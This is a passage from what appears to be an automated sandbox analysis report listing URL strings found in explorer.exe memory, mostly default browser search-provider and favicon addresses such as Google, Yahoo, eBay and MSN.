Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.aol.com/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.aol.in/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.atlas.cz/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.auction.co.kr/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.auone.jp/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.books.com.tw/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.books.com.tw/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.centrum.cz/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.centrum.cz/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.chol.com/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.chol.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.cn.yahoo.com/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.daum.net/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.daum.net/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.dreamwiz.com/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.dreamwiz.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ebay.co.uk/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ebay.com/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ebay.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ebay.de/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ebay.es/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ebay.fr/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ebay.in/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ebay.it/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.empas.com/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.empas.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.espn.go.com/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.gamer.com.tw/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.gamer.com.tw/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.gismeteo.ru/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.goo.ne.jp/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.goo.ne.jp/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.hanafos.com/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.hanafos.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.interpark.com/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ipop.co.kr/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ipop.co.kr/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?q=
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.livedoor.com/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.livedoor.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.lycos.co.uk/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.lycos.com/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.lycos.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.msn.co.jp/results.aspx?q=
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.msn.co.uk/results.aspx?q=
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.msn.com.cn/results.aspx?q=
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.msn.com/results.aspx?q=
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.nate.com/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.naver.com/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.naver.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.nifty.com/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.orange.co.uk/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.orange.co.uk/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.rediff.com/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.rediff.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.seznam.cz/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.seznam.cz/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.sify.com/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.yahoo.co.jp
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.yahoo.co.jp/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.yahoo.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.yam.com/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search1.taobao.com/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search2.estadao.com.br/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://searchresults.news.com.au/
Source: explorer.exe, 00000006.00000000.2105636613.0000000004F30000.00000002.00000001.sdmp String found in binary or memory: http://servername/isapibackend.dll
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://service2.bfast.com/
Source: explorer.exe, 00000006.00000000.2102797135.0000000003E27000.00000002.00000001.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://sitesearch.timesonline.co.uk/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://so-net.search.goo.ne.jp/
Source: explorer.exe, 00000006.00000000.2110580739.000000000842E000.00000004.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/2b/a5ea21.ico
Source: explorer.exe, 00000006.00000000.2120160789.00000000002BB000.00000004.00000020.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://suche.aol.de/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://suche.freenet.de/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://suche.freenet.de/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://suche.lycos.de/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://suche.t-online.de/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://suche.web.de/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://suche.web.de/favicon.ico
Source: explorer.exe, 00000006.00000000.2117147889.000000000A330000.00000008.00000001.sdmp String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://tw.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://udn.com/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://udn.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://uk.ask.com/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://uk.ask.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://uk.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://vachercher.lycos.fr/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://video.globo.com/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://video.globo.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://web.ask.com/
Source: explorer.exe, 00000006.00000000.2102797135.0000000003E27000.00000002.00000001.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: explorer.exe, 00000006.00000000.2117147889.000000000A330000.00000008.00000001.sdmp String found in binary or memory: http://www.%s.com
Source: explorer.exe, 00000006.00000000.2097589761.0000000001C70000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.abril.com.br/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.abril.com.br/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.alarabiya.net/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.alarabiya.net/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.amazon.co.jp/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.amazon.co.uk/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.amazon.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.amazon.de/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.aol.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.arrakis.com/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.arrakis.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.asharqalawsat.com/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.asharqalawsat.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ask.com/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.auction.co.kr/auction.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.baidu.com/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.baidu.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.cdiscount.com/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.cdiscount.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ceneo.pl/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ceneo.pl/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.cjmall.com/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.cjmall.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.clarin.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.cnet.co.uk/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.cnet.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.dailymail.co.uk/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.dailymail.co.uk/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.etmall.com.tw/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.etmall.com.tw/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.excite.co.jp/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.expedia.com/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.expedia.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.gismeteo.ru/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.gmarket.co.kr/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.gmarket.co.kr/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.co.in/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.co.jp/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.co.uk/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.com.br/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.com.sa/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.com.tw/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.com/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.cz/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.de/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.es/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.fr/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.it/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.pl/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.ru/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.si/
Source: explorer.exe, 00000006.00000000.2102624718.0000000003C40000.00000002.00000001.sdmp String found in binary or memory: http://www.hotmail.com/oe
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.iask.com/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.iask.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2102797135.0000000003E27000.00000002.00000001.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.kkbox.com.tw/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.kkbox.com.tw/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.linternaute.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.maktoob.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.mercadolibre.com.mx/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.mercadolivre.com.br/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.merlin.com.pl/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.merlin.com.pl/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&amp;a=
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
Source: explorer.exe, 00000006.00000000.2103167927.0000000004263000.00000004.00000001.sdmp String found in binary or memory: http://www.msn.com/?ocid=iehp
Source: explorer.exe, 00000006.00000000.2103167927.0000000004263000.00000004.00000001.sdmp String found in binary or memory: http://www.msn.com/?ocid=iehp&
Source: explorer.exe, 00000006.00000000.2110580739.000000000842E000.00000004.00000001.sdmp String found in binary or memory: http://www.msn.com/?ocid=iehps
Source: explorer.exe, 00000006.00000000.2103167927.0000000004263000.00000004.00000001.sdmp String found in binary or memory: http://www.msn.com/de-de/?ocid=iehp
Source: explorer.exe, 00000006.00000000.2102624718.0000000003C40000.00000002.00000001.sdmp String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.mtv.com/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.mtv.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.myspace.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.najdi.si/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.najdi.si/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.nate.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.neckermann.de/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.neckermann.de/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.news.com.au/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.nifty.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ocn.ne.jp/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.orange.fr/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.otto.de/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ozon.ru/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ozon.ru/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ozu.es/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.paginasamarillas.es/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.paginasamarillas.es/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.pchome.com.tw/favicon.ico
Source: explorer.exe, 00000006.00000000.2102484793.00000000039F4000.00000004.00000001.sdmp String found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 00000006.00000000.2120123904.0000000000260000.00000004.00000020.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.priceminister.com/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.priceminister.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.rakuten.co.jp/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.rambler.ru/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.rambler.ru/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.recherche.aol.fr/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.rtl.de/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.rtl.de/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.servicios.clarin.com/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.shopzilla.com/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.sify.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.sogou.com/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.sogou.com/favicon.ico
